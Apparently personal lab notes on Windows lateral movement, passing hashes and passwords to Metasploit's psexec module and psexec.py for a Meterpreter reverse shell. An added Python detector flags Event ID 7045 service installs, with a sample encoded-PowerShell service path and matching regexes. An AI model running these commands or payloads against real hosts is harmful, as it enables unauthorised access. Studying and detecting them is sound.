…..using the things that were found before (SAM Hashes)
Different ways:
- Through Metasploit - with a password: exploit/windows/smb/psexec (NOISY)
- Through Metasploit - with a hash: exploit/windows/smb/psexec (NOISY)
- Through psexec - with a password: psexec.py marvel.local/fcastle:'Password1'@<IP>
- Through psexec - with a hash: psexec.py administrator@<IP> -hashes LM:NT
How I went about it
Metasploit method using password
- load msfconsole
- searched psexec
- chose exploit/windows/smb/psexec
- made sure the payload is for Windows x64. It was not, so in msfconsole => set payload windows/x64/meterpreter/reverse_tcp
- I am attacking fcastle so……need to set options accordingly
- for targets, it was set to Automatic, but Native upload works best and so does Powershell
  MOF upload and Command do not work (it seems)
- Run
Note:
Shells can be backgrounded using the background command while in a shell.
To return to the shell, list the currently running sessions by typing sessions and select the session. E.g. sessions 1

Note:
There are 2 parts of any hash - NT and LM

- If cracking passwords, usually only the LM part is required
- But when doing relays or passing the hash, both parts separated by : are required
Metasploit method using hash
- implemented similarly to the last one
- a few changes in the msfconsole were required though:
  - smbuser needs to be set to administrator
  - no smbdomain is required this time
  - put the hash in smbpass
- HENCE THERE WAS NO NEED TO CRACK THE PASSWORD
- got local admin shell because of password reuse
PSEXEC.PY method using password

PSEXEC.PY method using hash

Note:
other programs are also available if psexec.py doesn't work:
wmiexec and smbexec work exactly like psexec
!!! SHELLS ARE NOT NECESSARILY NEEDED TO SUCCESSFULLY PWN A MACHINE JUST SOMETHING TO HAVE IN CASE THAT IS REQUIRED !!!
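From the defender's side, every method in these notes (Metasploit psexec with the Native upload or Powershell target, psexec.py, and the Sysinternals tool they imitate) leaves the same trace on the target: a new service is installed, which Windows records in the System log as Event ID 7045. The following is an added example, not part of the original notes, that runs three heuristics over constructed 7045 records; the dictionary field names, sample hostnames and the random-looking service and file names are assumptions made up for the example.

```python
import re

# Constructed sample records modelled on Windows System log Event ID 7045
# ("a service was installed in the system"). Field names are assumptions.
SAMPLE_EVENTS = [
    {"event_id": 7045, "host": "WS01", "service_name": "Spooler",
     "image_path": r"C:\Windows\System32\spoolsv.exe"},
    {"event_id": 7045, "host": "WS01", "service_name": "PSEXESVC",
     "image_path": r"%SystemRoot%\PSEXESVC.exe"},
    {"event_id": 7045, "host": "WS02", "service_name": "kqFbXyQw",
     "image_path": r"%systemroot%\hVkTaRpB.exe"},
    {"event_id": 7045, "host": "WS02", "service_name": "wMnDrZaF",
     "image_path": r"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e <encoded-command-omitted>"},
    {"event_id": 7036, "host": "WS01", "service_name": "Spooler", "image_path": ""},
]

# Heuristics, each tied to a behaviour from the notes above:
#  - Sysinternals PsExec installs a service literally named PSEXESVC.
#  - "Native upload" style tools drop a randomly named .exe into the system
#    root and register it under an equally random service name.
#  - The "Powershell" target registers a service whose binary path is an
#    encoded PowerShell one-liner instead of a file on disk.
RANDOM_NAME = re.compile(r"^[A-Za-z]{4,16}$")
ROOT_DROP = re.compile(r"^%systemroot%\\[A-Za-z]{4,16}\.exe$", re.IGNORECASE)
PS_ONELINER = re.compile(r"powershell(\.exe)?\b.*\s-(e|enc|encodedcommand)\s", re.IGNORECASE)

def classify(event):
    """Return why a 7045 record looks like psexec-style lateral movement, or None."""
    if event.get("event_id") != 7045:
        return None
    name, path = event.get("service_name", ""), event.get("image_path", "")
    if name.upper() == "PSEXESVC":
        return "sysinternals psexec service"
    if RANDOM_NAME.match(name) and ROOT_DROP.match(path):
        return "random service name with binary dropped in system root"
    if PS_ONELINER.search(path):
        return "service running an encoded powershell command"
    return None

def find_psexec_style_services(events):
    """Walk the records and return one alert per suspicious service install."""
    alerts = []
    for ev in events:
        reason = classify(ev)
        if reason:
            alerts.append({"host": ev["host"], "service": ev["service_name"], "reason": reason})
    return alerts

if __name__ == "__main__":
    for a in find_psexec_style_services(SAMPLE_EVENTS):
        print(f"{a['host']}: service {a['service']!r} -> {a['reason']}")
```

The third rule in particular shows why the local admin shell in the notes was possible: the same local administrator password on every host means one 7045 hit on one machine should be treated as a sign the whole fleet is exposed, which is the case for unique per-host local admin passwords.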